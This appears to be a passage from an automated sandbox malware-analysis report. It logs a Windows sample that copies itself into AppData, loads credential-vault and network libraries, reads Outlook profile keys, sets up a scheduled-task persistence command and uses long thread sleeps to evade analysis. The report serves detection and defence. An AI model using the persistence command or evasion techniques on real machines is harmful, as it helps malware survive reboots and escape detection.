                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: Window Recorder Window detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                      Source: kAsh3nmsgs.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: kAsh3nmsgs.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: kAsh3nmsgs.exe Static PE information: 0xCC1F1A8D [Sat Jul 9 11:07:57 2078 UTC]
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Code function: 0_2_09D53D8B push 69CC4589h; ret 0_2_09D53D96
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Code function: 0_2_09D53C0B push 69CC4589h; ret 0_2_09D53C1B
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Code function: 0_2_09D536A0 pushfd ; iretd 0_2_09D536A1
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Code function: 0_2_0A0426AB pushfd ; retf 0_2_0A0426AD
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Code function: 8_2_06A17670 push esp; iretd 8_2_06A17679
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Code function: 8_2_06A1B200 push es; ret 8_2_06A1B210
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Code function: 8_2_06A17C24 push esp; iretd 8_2_06A17C2D
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Code function: 9_2_09883DCF push 69C44589h; ret 9_2_09883DD4
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Code function: 9_2_0988F54B push ecx; iretd 9_2_0988F54C
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Code function: 9_2_098836A0 pushfd ; iretd 9_2_098836A1
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Code function: 9_2_0B2D26A8 pushfd ; retf 9_2_0B2D26AD
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Code function: 13_2_06CA7E3A push esi; iretd 13_2_06CA7E3B
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Code function: 13_2_06CA2C92 pushad ; ret 13_2_06CA2C93
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Code function: 13_2_06CA2AAC push esp; ret 13_2_06CA2AAD
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Code function: 13_2_06CA2A52 push esp; ret 13_2_06CA2A53
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Code function: 13_2_06CA28E8 push eax; ret 13_2_06CA28E9
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Code function: 13_2_06CAF9B0 pushad ; ret 13_2_06CAF9B1
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Code function: 13_2_06D97670 push esp; iretd 13_2_06D97679
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Code function: 13_2_06D97C24 push esp; iretd 13_2_06D97C2D
                      Source: kAsh3nmsgs.exe Static PE information: section name: .text entropy: 7.744400724877213
                      Source: HHhSyZN.exe.0.dr Static PE information: section name: .text entropy: 7.744400724877213
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe File created: C:\Users\user\AppData\Roaming\HHhSyZN.exe

                      Boot Survival

                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp4794.tmp"

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match File source: Process Memory Space: kAsh3nmsgs.exe PID: 1216, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Memory allocated: 1480000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Memory allocated: 2F10000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Memory allocated: 2D10000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Memory allocated: 5510000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Memory allocated: 6510000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Memory allocated: 6640000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Memory allocated: 7640000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Memory allocated: B6C0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Memory allocated: C6C0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Memory allocated: CB50000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Memory allocated: DB50000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Memory allocated: 1170000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Memory allocated: 2C80000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Memory allocated: 4C80000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Memory allocated: 15E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Memory allocated: 3030000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Memory allocated: 5030000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Memory allocated: 56A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Memory allocated: 66A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Memory allocated: 67D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Memory allocated: 77D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Memory allocated: B2E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Memory allocated: C2E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Memory allocated: C770000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Memory allocated: D770000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Memory allocated: 1500000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Memory allocated: 2FD0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Memory allocated: 4FD0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Thread delayed: delay time: 1199969
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Thread delayed: delay time: 1199844
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Thread delayed: delay time: 1199734
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Thread delayed: delay time: 1199625
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Thread delayed: delay time: 1199516
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Thread delayed: delay time: 1199407
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Thread delayed: delay time: 1199282
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Thread delayed: delay time: 1199157
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Thread delayed: delay time: 1199047
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Thread delayed: delay time: 1198938
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Thread delayed: delay time: 1200000
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Thread delayed: delay time: 1199875
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Thread delayed: delay time: 1199766
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Thread delayed: delay time: 1199641
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Thread delayed: delay time: 1199531
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Thread delayed: delay time: 1199422
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Thread delayed: delay time: 1199313
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Thread delayed: delay time: 1199188
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Thread delayed: delay time: 1199063
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Thread delayed: delay time: 1198953
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Thread delayed: delay time: 1198839
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Thread delayed: delay time: 1198734
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Thread delayed: delay time: 1198625
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Thread delayed: delay time: 1198515
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6710
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6757
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Window / User API: threadDelayed 3617
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe Window / User API: threadDelayed 6231
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Window / User API: threadDelayed 7846
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe Window / User API: threadDelayed 2011
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 2676 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7268 Thread sleep count: 6710 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7488 Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7420 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7492 Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7428 Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -33204139332677172s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -99849s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -99718s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -99609s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -99500s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -99390s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -99280s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -99167s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -99059s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -98937s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -98828s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -98718s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -98609s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -98500s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -98390s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -98246s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -98140s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe TID: 7688 Thread sleep time: -98031s >= -30000s
